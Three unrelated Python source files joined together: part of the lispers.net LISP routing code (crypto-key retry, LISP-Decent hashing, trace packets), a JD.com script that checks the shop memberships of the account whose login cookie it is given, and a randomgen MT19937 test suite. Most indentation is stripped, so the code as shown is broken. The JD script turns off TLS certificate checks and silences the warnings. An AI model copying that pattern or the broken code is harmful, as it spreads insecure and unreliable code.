# Copy x.x.x.x:q to x.x.x.x. This is an expensive function. But it is hardly
# used. And once it is used for a particular addr_str, it shouldn't be used
# again.
#
# This function is only used when an ICV error occurs when x.x.x.x is the
# crypto-key used.
#
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
if (lisp_search_decap_keys == False): return
#
# Only use this function when the key matched was not port based.
#
if (addr_str.find(":") != -1): return
parent = lisp_crypto_keys_by_rloc_decap[addr_str]
for key in lisp_crypto_keys_by_rloc_decap:
#
# Find entry that has same source RLOC.
#
if (key.find(addr_str) == -1): continue
#
# Skip over parent entry.
#
if (key == addr_str): continue
#
# If crypto-keys the same, go to find next one.
#
entry = lisp_crypto_keys_by_rloc_decap[key]
if (entry == parent): continue
#
# Try ICV check. If works, then go to this key.
#
crypto_key = entry[1]
if (packet_icv != crypto_key.do_icv(packet, iv)):
lprint("Test ICV with key {} failed".format(red(key, False)))
continue
#endif
lprint("Changing decap crypto key to {}".format(red(key, False)))
lisp_crypto_keys_by_rloc_decap[addr_str] = entry
    #endfor
return
#enddef
#
# lisp_decent_pull_xtr_configured
#
# Return True if configured LISP-Decent modulus is not 0. Meaning we are using
# the LISP-Decent pull-based mapping system.
#
def lisp_decent_pull_xtr_configured():
return(lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)
#enddef
#
# lisp_is_decent_dns_suffix
#
# Return True if supplied DNS name ends with a configured LISP-Decent DNS
# suffix.
#
def lisp_is_decent_dns_suffix(dns_name):
if (lisp_decent_dns_suffix == None): return(False)
name = dns_name.split(".")
name = ".".join(name[1::])
return(name == lisp_decent_dns_suffix)
#enddef
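#
# For example, with a configured suffix of "lisp.example.com" (hypothetical),
# lisp_is_decent_dns_suffix("5.lisp.example.com") returns True and
# lisp_is_decent_dns_suffix("5.other.example.com") returns False.
#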
#
# lisp_get_decent_index
#
# Hash the EID-prefix and mod the configured LISP-Decent modulus value.
#
def lisp_get_decent_index(eid):
eid_str = eid.print_prefix()
hash_value = hashlib.sha256(eid_str).hexdigest()
index = int(hash_value, 16) % lisp_decent_modulus
return(index)
#enddef
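#
# Illustrative sketch, with a hypothetical modulus of 16 and EID-prefix
# string "[1000]10.0.0.0/8":
#
#   index = int(hashlib.sha256("[1000]10.0.0.0/8").hexdigest(), 16) % 16
#
# The resulting index (0..15) is prepended to the DNS suffix below, e.g.
# "7.lisp.example.com" if the hash maps to 7 with the hypothetical suffix
# used above.
#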
#
# lisp_get_decent_dns_name
#
# Based on EID, get index and prepend to LISP-Decent DNS name suffix.
#
def lisp_get_decent_dns_name(eid):
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_dns_name_from_str
#
# Supplied source and group are addresses passed as strings. Build in internal
# lisp_address() to pass into lisp_get_decent_index().
#
def lisp_get_decent_dns_name_from_str(iid, eid_str):
eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_trace_append
#
# Append JSON data to trace packet. If this is the ETR, the EIDs will be
# swapped to return packet to originator.
#
# Returning False means the caller should return (and not forward the packet).
#
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None):
offset = 28 if packet.inner_version == 4 else 48
trace_pkt = packet.packet[offset::]
trace = lisp_trace()
if (trace.decode(trace_pkt) == False):
lprint("Could not decode JSON portion of a LISP-Trace packet")
return(False)
#endif
next_rloc = "?" if packet.outer_dest.is_null() else \
packet.outer_dest.print_address_no_iid()
#
    # Display port if the caller is an encapsulating RTR using a translated
# RLOC.
#
if (next_rloc != "?" and packet.encap_port != LISP_DATA_PORT):
if (ed == "encap"): next_rloc += ":{}".format(packet.encap_port)
#endif
#
# Add node entry data for the encapsulation or decapsulation.
#
entry = {}
entry["node"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else \
"RTR" if lisp_i_am_rtr else "?"
srloc = packet.outer_source
if (srloc.is_null()): srloc = lisp_myrlocs[0]
entry["srloc"] = srloc.print_address_no_iid()
#
# In the source RLOC include the ephemeral port number of the ltr client
# so RTRs can return errors to the client behind a NAT.
#
if (entry["node"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT):
entry["srloc"] += ":{}".format(packet.inner_sport)
#endif
entry["hostname"] = lisp_hostname
key = ed + "-timestamp"
entry[key] = lisp_get_timestamp()
#
    # If this is an ETR decap entry and the drloc is "?", the packet came in on
# lisp_etr_nat_data_plane() where the kernel strips the outer header. Get
# the local/private RLOC from our database-mapping.
#
if (next_rloc == "?" and entry["node"] == "ETR"):
db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db != None and len(db.rloc_set) >= 1):
next_rloc = db.rloc_set[0].rloc.print_address_no_iid()
#endif
#endif
entry["drloc"] = next_rloc
#
# If there is a reason there is no dest RLOC, include it.
#
if (next_rloc == "?" and reason != None):
entry["drloc"] += " ({})".format(reason)
#endif
#
# Build seid->deid record if it does not exist. Then append node entry
# to record below, in the search loop.
#
seid = packet.inner_source.print_address()
deid = packet.inner_dest.print_address()
if (trace.packet_json == []):
rec = {}
rec["seid"] = seid
rec["deid"] = deid
rec["paths"] = []
trace.packet_json.append(rec)
#endif
#
    # Search for record. If we are appending the first ITR node entry, get
    # its RLOC address in case we have to return-to-sender.
#
for rec in trace.packet_json:
if (rec["deid"] != deid): continue
rec["paths"].append(entry)
break
#endfor
#
# If we are destination-EID, add a new record deid->seid if we have not
# completed a round-trip. The ETR will deliver this packet from its own
# EID which means the co-located ITR will pcap the packet and add its
# encap node entry.
#
swap = False
if (len(trace.packet_json) == 1 and trace.myeid(packet.inner_dest)):
rec = {}
rec["seid"] = deid
rec["deid"] = seid
rec["paths"] = []
trace.packet_json.append(rec)
swap = True
#endif
#
    # Print the JSON packet after appending data to it. Put the new JSON in the
    # packet. Fix up the lengths and checksums of the inner headers.
#
trace.print_trace()
trace_pkt = trace.encode()
#
# If next_rloc is not known, we need to return packet to sender.
#
    # Otherwise we are forwarding a packet that is about to be encapsulated or we
# are forwarding a packet that was just decapsulated with the addresses
# swapped so we can turn it around.
#
sender_rloc = trace.packet_json[0]["paths"][0]["srloc"]
if (next_rloc == "?"):
lprint("LISP-Trace return to sender RLOC {}".format(sender_rloc))
trace.return_to_sender(lisp_socket, sender_rloc, trace_pkt)
return(False)
#endif
#
# Compute length of trace packet. This includes the UDP header, Trace
# header, and JSON payload.
#
udplen = trace.packet_length()
#
    # Fix up the UDP length. Recompute the UDP checksum if this is an IPv6
    # packet, zero it otherwise. Only compute the checksum when the Trace went
    # round-trip and this is the local ETR delivering the EID-based Trace
    # packet to the client ltr.
#
headers = packet.packet[0:offset]
p = struct.pack("HH", socket.htons(udplen), 0)
headers = headers[0:offset-4] + p
if (packet.inner_version == 6 and entry["node"] == "ETR" and
len(trace.packet_json) == 2):
udp = headers[offset-8::] + trace_pkt
udp = lisp_udp_checksum(seid, deid, udp)
headers = headers[0:offset-8] + udp[0:8]
#endif
#
    # If we are swapping addresses, do it here so the JSON append and IP header
    # field changes are all reflected in the new IPv4 header checksum.
#
if (swap):
if (packet.inner_version == 4):
headers = headers[0:12] + headers[16:20] + headers[12:16] + \
headers[22:24] + headers[20:22] + headers[24::]
else:
headers = headers[0:8] + headers[24:40] + headers[8:24] + \
headers[42:44] + headers[40:42] + headers[44::]
#endif
d = packet.inner_dest
packet.inner_dest = packet.inner_source
packet.inner_source = d
#endif
#
# Fix up IP length.
#
offset = 2 if packet.inner_version == 4 else 4
iplen = 20 + udplen if packet.inner_version == 4 else udplen
h = struct.pack("H", socket.htons(iplen))
headers = headers[0:offset] + h + headers[offset+2::]
#
# Fix up IPv4 header checksum.
#
if (packet.inner_version == 4):
c = struct.pack("H", 0)
headers = headers[0:10] + c + headers[12::]
h = lisp_ip_checksum(headers[0:20])
headers = h + headers[20::]
#endif
#
# Caller is forwarding packet, either as an ITR, RTR, or ETR.
#
packet.packet = headers + trace_pkt
return(True)
#enddef
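#
# lisp_trace_swap_example
#
# Illustrative sketch, not part of the original lispers.net code: isolates the
# byte-slicing used in lisp_trace_append() to swap the inner IPv4 addresses
# and UDP ports when a Trace packet is turned around. The addresses and ports
# below are made-up sample values.
#
def lisp_trace_swap_example():
    #
    # Build a minimal 20-byte IPv4 header (1.1.1.1 -> 2.2.2.2) followed by an
    # 8-byte UDP header (sport 1111, dport 2222). Checksums are left zero since
    # only the slicing is being demonstrated.
    #
    ip = struct.pack("!BBHHHBBH", 0x45, 0, 28, 0, 0, 64, 17, 0) + \
        socket.inet_aton("1.1.1.1") + socket.inet_aton("2.2.2.2")
    udp = struct.pack("!HHHH", 1111, 2222, 8, 0)
    headers = ip + udp
    #
    # Same slicing as the swap case in lisp_trace_append() for inner_version 4.
    # Afterwards the header reads 2.2.2.2 -> 1.1.1.1, sport 2222, dport 1111.
    #
    headers = headers[0:12] + headers[16:20] + headers[12:16] + \
        headers[22:24] + headers[20:22] + headers[24::]
    return(headers)
#enddef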
#------------------------------------------------------------------------------
|
get_user_brand_member.py
|
"""
Fetch the venderIDs of shops that this account has already joined as a member
---
user_shop_venderId.txt
"""
import os
import sys
import requests
import re
import threading
# Fill in the cookie used for the scan here
COOKIE = "" or "pt_key=" + sys.argv[1] + ";pt_pin=" + sys.argv[2]
THREAD = 8
def get_file_path(file_name=""):
"""
    Get the absolute path of a file, to avoid errors in some environments
    :param file_name: file name
:return:
"""
return os.path.join(os.path.split(sys.argv[0])[0], file_name)
def get_venderId(shop_id):
"""
    Convert a `shop_id` into a `venderId`
    :param shop_id:
    :return: bool: whether the lookup succeeded, str: venderID
"""
    try:
        res = requests.get("https://shop.m.jd.com/?shopId=" + str(shop_id), verify=False)
        # Reuse the single findall() result instead of compiling and matching twice.
        _res = re.compile("venderId: '(\\d*)'").findall(res.text)
        if res.status_code == 200 and len(_res):
            return True, _res[0]
        else:
            return False, None
    except Exception:
        return False, None
def _get_shop_open_card_info(cookie, venderId):
params = {
"appid": "jd_shop_member",
"functionId": "getShopOpenCardInfo",
"body": '{"venderId":"' + str(venderId) + '","channel":406}',
"client": "H5",
"clientVersion": "9.2.0",
"uuid": "88888"
}
host = "api.m.jd.com"
url = "https://api.m.jd.com/client.action"
headers = {
"Cookie": cookie,
"Host": host,
"Referer": "https://m.jd.com",
"User-Agent": "Mozilla/5.0 (Linux; Android 9; COR-AL00) AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/77.0.3865.116 Mobile Safari/537.36 EdgA/46.03.4.5155 "
}
try:
res = requests.get(url, params=params, headers=headers, verify=False)
# print(res.json())
if res.status_code == 200 and res.json()['success']:
return True, str(venderId), bool(res.json()['result']['userInfo']['openCardStatus'])
else:
return False, str(venderId), False
    except Exception:
return False, str(venderId), False
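# Illustrative sketch (not part of the original script): how the two helpers
# above compose for a single shop. The shop id mentioned in the docstring is a
# placeholder, not a real value.
def check_one_shop(cookie, shop_id):
    """
    Resolve `shop_id` (e.g. 1000001234) to a venderId and query the membership
    status once.
    :return: (venderId, is_member), or (None, False) on any failure
    """
    ok, vender_id = get_venderId(shop_id)
    if not ok:
        return None, False
    ok, vender_id, is_member = _get_shop_open_card_info(cookie, vender_id)
    return (vender_id, is_member) if ok else (None, False)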
def get_user_brand_member(thread):
global process
for _ in shop_ids[thread::THREAD]:
process[0] += 1
info = _get_shop_open_card_info(COOKIE, get_venderId(int(_))[1])
if info[0] and info[2]:
process[1] += 1
            with open(get_file_path("user_shop_venderId.txt"), "a", encoding="utf-8") as f:
                f.write(info[1] + "\n")
        print("\rScanned {} shops; you are a member of {} of them. Results saved to `user_shop_venderId.txt`".format(process[0], process[1]), end="")
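# Illustrative sketch (not part of the original script): the worker above splits
# the workload by stride slicing, `shop_ids[thread::THREAD]`. This helper shows
# the same partitioning on a plain list so the scheme is easy to verify.
def partition_example():
    items = list(range(10))
    # With THREAD = 8, thread 0 gets [0, 8], thread 1 gets [1, 9], and threads
    # 2-7 each get one item; together the slices cover every item exactly once.
    return [items[t::THREAD] for t in range(THREAD)]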
if __name__ == '__main__':
process = [0, 0]
    # Suppress warnings
requests.packages.urllib3.disable_warnings()
open(get_file_path("user_shop_venderId.txt"), "w").close()
shop_ids = open(get_file_path("shopid.txt"), "r").readlines()
for thread in range(THREAD):
threading.Thread(target=get_user_brand_member, args=(thread,)).start()
|
test_generator_mt19937.py
|
from distutils.version import LooseVersion
import hashlib
import sys
import warnings
import numpy as np
from numpy.linalg import LinAlgError
from numpy.testing import (
assert_,
assert_allclose,
assert_array_almost_equal,
assert_array_equal,
assert_equal,
assert_no_warnings,
assert_raises,
assert_warns,
suppress_warnings,
)
import pytest
from randomgen import MT19937, Generator
from randomgen.tests.test_direct import assert_state_equal
random = Generator(MT19937(mode="legacy"))
NP_LT_118 = LooseVersion(np.__version__) < LooseVersion("1.18.0")
JUMP_TEST_DATA = {
("_jump_tester", (0,), 10): {
"initial": {"key_md5": "64eaf265d2203179fb5ffb73380cd589", "pos": 9},
"jumped": {"key_md5": "14e9a7d1e247f0f8565b77784c9a6b83", "pos": 601},
},
("_jump_tester", (384908324,), 312): {
"initial": {"key_md5": "e99708a47b82ff51a2c7b0625b81afb5", "pos": 311},
"jumped": {"key_md5": "8bfd5e1ab46befd06cc54146541f1ce8", "pos": 279},
},
("_jump_tester", (839438204, 980239840, 859048019, 821), 511): {
"initial": {"key_md5": "9fcd6280df9199785e17e93162ce283c", "pos": 510},
"jumped": {"key_md5": "f8ac8f010bd3eabc8afbc8b690220177", "pos": 478},
},
("jumped", (0,), 10): {
"initial": {"key_md5": "64eaf265d2203179fb5ffb73380cd589", "pos": 9},
"jumped": {"key_md5": "8cb7b061136efceef5217a9ce2cc9a5a", "pos": 598},
},
("jumped", (384908324,), 312): {
"initial": {"key_md5": "e99708a47b82ff51a2c7b0625b81afb5", "pos": 311},
"jumped": {"key_md5": "2ecdbfc47a895b253e6e19ccb2e74b90", "pos": 276},
},
("jumped", (839438204, 980239840, 859048019, 821), 511): {
"initial": {"key_md5": "9fcd6280df9199785e17e93162ce283c", "pos": 510},
"jumped": {"key_md5": "433b85229f2ed853cde06cd872818305", "pos": 475},
},
}
@pytest.fixture(scope="module", params=[True, False])
def endpoint(request):
return request.param
class TestSeed(object):
def test_scalar(self):
s = Generator(MT19937(0, mode="legacy"))
assert_equal(s.integers(1000), 684)
s = Generator(MT19937(4294967295, mode="legacy"))
assert_equal(s.integers(1000), 419)
def test_array(self):
s = Generator(MT19937(range(10), mode="legacy"))
assert_equal(s.integers(1000), 468)
s = Generator(MT19937(np.arange(10), mode="legacy"))
assert_equal(s.integers(1000), 468)
s = Generator(MT19937([0], mode="legacy"))
assert_equal(s.integers(1000), 973)
s = Generator(MT19937([4294967295], mode="legacy"))
assert_equal(s.integers(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, MT19937, -0.5, mode="legacy")
assert_raises(ValueError, MT19937, -1, mode="legacy")
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, MT19937, [-0.5], mode="legacy")
assert_raises(ValueError, MT19937, [-1], mode="legacy")
assert_raises(ValueError, MT19937, [4294967296], mode="legacy")
assert_raises(ValueError, MT19937, [1, 2, 4294967296], mode="legacy")
assert_raises(ValueError, MT19937, [1, -2, 4294967296], mode="legacy")
def test_noninstantized_bitgen(self):
assert_raises(ValueError, Generator, MT19937)
class TestBinomial(object):
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype="int")
for p in [0, 0.5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial(object):
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.integers(-5, -1) < -1)
x = random.integers(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, random.multinomial, 1, p, float(1))
def test_invalid_prob(self):
assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2])
assert_raises(ValueError, random.multinomial, 100, [-0.1, 0.9])
def test_invalid_n(self):
assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2])
assert_raises(ValueError, random.multinomial, [-1] * 10, [0.8, 0.2])
def test_p_noncontiguous(self):
p = np.arange(15.0)
p /= np.sum(p[1::3])
pvals = p[1::3]
random.seed(1432985819)
non_contig = random.multinomial(100, pvals=pvals)
random.seed(1432985819)
contig = random.multinomial(100, pvals=np.ascontiguousarray(pvals))
assert_array_equal(non_contig, contig)
def test_large_p(self):
with pytest.raises(ValueError, match=r"sum\(pvals"):
random.multinomial(100, np.array([0.7, 0.6, 0.5, 0]))
class TestSetState(object):
def setup(self):
self.seed = 1234567890
self.rg = Generator(MT19937(self.seed, mode="legacy"))
self.bit_generator = self.rg.bit_generator
self.state = self.bit_generator.state
self.legacy_state = (
self.state["bit_generator"],
self.state["state"]["key"],
self.state["state"]["pos"],
)
def test_basic(self):
with pytest.deprecated_call():
old = self.rg.tomaxint(16)
self.bit_generator.state = self.state
with pytest.deprecated_call():
new = self.rg.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.rg.standard_normal(size=3)
self.bit_generator.state = self.state
new = self.rg.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.rg.standard_normal()
state = self.bit_generator.state
old = self.rg.standard_normal(size=3)
self.bit_generator.state = state
new = self.rg.standard_normal(size=3)
assert_(np.all(old == new))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.rg.negative_binomial(0.5, 0.5)
class TestIntegers(object):
rfunc = random.integers
# valid integer/boolean types
itype = [
bool,
np.int8,
np.uint8,
np.int16,
np.uint16,
np.int32,
np.uint32,
np.int64,
np.uint64,
]
def test_unsupported_type(self, endpoint):
assert_raises(TypeError, self.rfunc, 1, endpoint=endpoint, dtype=float)
def test_bounds_checking(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
assert_raises(
ValueError, self.rfunc, lbnd - 1, ubnd, endpoint=endpoint, dtype=dt
)
assert_raises(
ValueError, self.rfunc, lbnd, ubnd + 1, endpoint=endpoint, dtype=dt
)
assert_raises(
ValueError, self.rfunc, ubnd, lbnd, endpoint=endpoint, dtype=dt
)
assert_raises(ValueError, self.rfunc, 1, 0, endpoint=endpoint, dtype=dt)
assert_raises(
ValueError, self.rfunc, [lbnd - 1], ubnd, endpoint=endpoint, dtype=dt
)
assert_raises(
ValueError, self.rfunc, [lbnd], [ubnd + 1], endpoint=endpoint, dtype=dt
)
assert_raises(
ValueError, self.rfunc, [ubnd], [lbnd], endpoint=endpoint, dtype=dt
)
assert_raises(ValueError, self.rfunc, 1, [0], endpoint=endpoint, dtype=dt)
def test_bounds_checking_array(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + (not endpoint)
assert_raises(
ValueError,
self.rfunc,
[lbnd - 1] * 2,
[ubnd] * 2,
endpoint=endpoint,
dtype=dt,
)
assert_raises(
ValueError,
self.rfunc,
[lbnd] * 2,
[ubnd + 1] * 2,
endpoint=endpoint,
dtype=dt,
)
assert_raises(
ValueError, self.rfunc, ubnd, [lbnd] * 2, endpoint=endpoint, dtype=dt
)
assert_raises(
ValueError, self.rfunc, [1] * 2, 0, endpoint=endpoint, dtype=dt
)
def test_rng_zero_and_extremes(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
is_open = not endpoint
tgt = ubnd - 1
assert_equal(
self.rfunc(tgt, tgt + is_open, size=1000, endpoint=endpoint, dtype=dt),
tgt,
)
assert_equal(
self.rfunc(
[tgt], tgt + is_open, size=1000, endpoint=endpoint, dtype=dt
),
tgt,
)
tgt = lbnd
assert_equal(
self.rfunc(tgt, tgt + is_open, size=1000, endpoint=endpoint, dtype=dt),
tgt,
)
assert_equal(
self.rfunc(
tgt, [tgt + is_open], size=1000, endpoint=endpoint, dtype=dt
),
tgt,
)
tgt = (lbnd + ubnd) // 2
assert_equal(
self.rfunc(tgt, tgt + is_open, size=1000, endpoint=endpoint, dtype=dt),
tgt,
)
assert_equal(
self.rfunc(
[tgt], [tgt + is_open], size=1000, endpoint=endpoint, dtype=dt
),
tgt,
)
def test_rng_zero_and_extremes_array(self, endpoint):
size = 1000
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
tgt = ubnd - 1
assert_equal(self.rfunc([tgt], [tgt + 1], size=size, dtype=dt), tgt)
assert_equal(self.rfunc([tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(
self.rfunc([tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt
)
tgt = lbnd
assert_equal(self.rfunc([tgt], [tgt + 1], size=size, dtype=dt), tgt)
assert_equal(self.rfunc([tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(
self.rfunc([tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt
)
tgt = (lbnd + ubnd) // 2
assert_equal(self.rfunc([tgt], [tgt + 1], size=size, dtype=dt), tgt)
assert_equal(self.rfunc([tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(
self.rfunc([tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt
)
def test_full_range(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError(
"No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e)
)
def test_full_range_array(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc([lbnd] * 2, [ubnd], endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError(
"No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e)
)
def test_in_bounds_fuzz(self, endpoint):
        # Don't use a fixed seed
random.bit_generator.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(
2, ubnd - endpoint, size=2 ** 16, endpoint=endpoint, dtype=dt
)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2 - endpoint, size=2 ** 16, endpoint=endpoint, dtype=bool)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_scalar_array_equiv(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
size = 1000
random.bit_generator.seed(1234)
scalar = self.rfunc(lbnd, ubnd, size=size, endpoint=endpoint, dtype=dt)
random.bit_generator.seed(1234)
scalar_array = self.rfunc(
[lbnd], [ubnd], size=size, endpoint=endpoint, dtype=dt
)
random.bit_generator.seed(1234)
array = self.rfunc(
[lbnd] * size, [ubnd] * size, size=size, endpoint=endpoint, dtype=dt
)
assert_array_equal(scalar, scalar_array)
assert_array_equal(scalar, array)
def test_repeatability(self, endpoint):
import hashlib
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {
"bool": "7dd3170d7aa461d201a65f8bcf3944b0",
"int16": "1b7741b80964bb190c50d541dca1cac1",
"int32": "4dc9fcc2b395577ebb51793e58ed1a05",
"int64": "17db902806f448331b5a758d7d2ee672",
"int8": "27dd30c4e08a797063dffac2490b0be6",
"uint16": "1b7741b80964bb190c50d541dca1cac1",
"uint32": "4dc9fcc2b395577ebb51793e58ed1a05",
"uint64": "17db902806f448331b5a758d7d2ee672",
"uint8": "27dd30c4e08a797063dffac2490b0be6",
}
for dt in self.itype[1:]:
random.bit_generator.seed(1234)
# view as little endian for hash
if sys.byteorder == "little":
val = self.rfunc(
0, 6 - endpoint, size=1000, endpoint=endpoint, dtype=dt
)
else:
val = self.rfunc(
0, 6 - endpoint, size=1000, endpoint=endpoint, dtype=dt
).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
random.bit_generator.seed(1234)
val = self.rfunc(
0, 2 - endpoint, size=1000, endpoint=endpoint, dtype=bool
).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_repeatability_broadcasting(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt in (bool, np.bool_) else np.iinfo(dt).min
ubnd = 2 if dt in (bool, np.bool_) else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# view as little endian for hash
random.bit_generator.seed(1234)
val = self.rfunc(lbnd, ubnd, size=1000, endpoint=endpoint, dtype=dt)
random.bit_generator.seed(1234)
val_bc = self.rfunc([lbnd] * 1000, ubnd, endpoint=endpoint, dtype=dt)
assert_array_equal(val, val_bc)
random.bit_generator.seed(1234)
val_bc = self.rfunc(
[lbnd] * 1000, [ubnd] * 1000, endpoint=endpoint, dtype=dt
)
assert_array_equal(val, val_bc)
def test_repeatability_32bit_boundary_broadcasting(self):
desired = np.array(
[
[
[4184714646, 2953452547, 3636115811],
[3137091686, 500004980, 1758274813],
[827841543, 2071399968, 2653935293],
],
[
[1980473914, 2331635770, 643122924],
[806373568, 3436742405, 3326492796],
[819438482, 2041859381, 1972373725],
],
[
[2973988042, 1073437830, 395026719],
[2154927168, 964445294, 449660552],
[4126967444, 1410100955, 3481829584],
],
[
[136169376, 332583752, 1486552164],
[2199706765, 2840948792, 1367639842],
[3733647586, 810727718, 3455450384],
],
[
[2374161015, 433367801, 3216002152],
[595355362, 342429046, 2159480359],
[3577969687, 2369902420, 764825175],
],
]
)
for size in [None, (5, 3, 3)]:
random = Generator(MT19937(12345, mode="sequence"))
x = random.integers(
[[-1], [0], [1]], [2 ** 32 - 1, 2 ** 32, 2 ** 32 + 1], size=size
)
assert_array_equal(x, desired if size is not None else desired[0])
def test_int64_uint64_broadcast_exceptions(self, endpoint):
configs = {
np.uint64: ((0, 2 ** 65), (-1, 2 ** 62), (10, 9), (0, 0)),
np.int64: (
(0, 2 ** 64),
(-(2 ** 64), 2 ** 62),
(10, 9),
(0, 0),
(-(2 ** 63) - 1, -(2 ** 63) - 1),
),
}
for dtype in configs:
for config in configs[dtype]:
low, high = config
high = high - endpoint
low_a = np.array([[low] * 10])
high_a = np.array([high] * 10)
assert_raises(
ValueError,
random.integers,
low,
high,
endpoint=endpoint,
dtype=dtype,
)
assert_raises(
ValueError,
random.integers,
low_a,
high,
endpoint=endpoint,
dtype=dtype,
)
assert_raises(
ValueError,
random.integers,
low,
high_a,
endpoint=endpoint,
dtype=dtype,
)
assert_raises(
ValueError,
random.integers,
low_a,
high_a,
endpoint=endpoint,
dtype=dtype,
)
low_o = np.array([[low] * 10], dtype=object)
high_o = np.array([high] * 10, dtype=object)
assert_raises(
ValueError,
random.integers,
low_o,
high,
endpoint=endpoint,
dtype=dtype,
)
assert_raises(
ValueError,
random.integers,
low,
high_o,
endpoint=endpoint,
dtype=dtype,
)
assert_raises(
ValueError,
random.integers,
low_o,
high_o,
endpoint=endpoint,
dtype=dtype,
)
def test_int64_uint64_corner_case(self, endpoint):
        # When stored in Numpy arrays, `lbnd` is cast
        # as np.int64, and `ubnd` is cast as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
        # causing it to be rounded down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1 - endpoint)
# None of these function calls should
# generate a ValueError now.
actual = random.integers(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
